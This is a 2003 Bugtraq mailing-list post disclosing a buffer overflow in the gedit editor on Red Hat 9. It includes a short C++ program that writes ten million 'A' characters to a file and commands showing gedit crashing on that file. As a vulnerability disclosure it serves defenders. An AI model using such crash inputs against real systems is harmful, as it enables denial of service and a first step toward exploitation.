[32543] in bugtraq
simple buffer overflow in gedit
daemon@ATHENA.MIT.EDU (Andreas "Constantinides (MegaHz))
Mon Nov 24 13:29:41 2003
From: Andreas "Constantinides (MegaHz)" <megahz@megahz.org>
To: bugtraq@securityfocus.com
Content-Type: text/plain
Message-Id: <1069598205.8830.20.camel@megahz>
Mime-Version: 1.0
Date: 23 Nov 2003 16:37:30 +0200
Content-Transfer-Encoding: 7bit
Hello,
I discover a strange but simple buffer overflow in gedit.
I am using RH9,
to demostrate the buffer here is a simple file buffer generator:
===========buffer.c == cut here===============
/*
simple buffer overflow generator by MegaHz megahz@megahz.org
*/
#include <iostream>
using namespace std;
int main()
{
int i;
for (i=0;i<=9999999;i++)
{
cout << "A";
}
return 0;
}
===========================================
# g++ -o buffer buffer.c
# ./buffer > lala
# gedit lala
Segmentation fault
#
MegaHz (Andreas Constantinides)
www.megahz.org
www.cyhackportal.com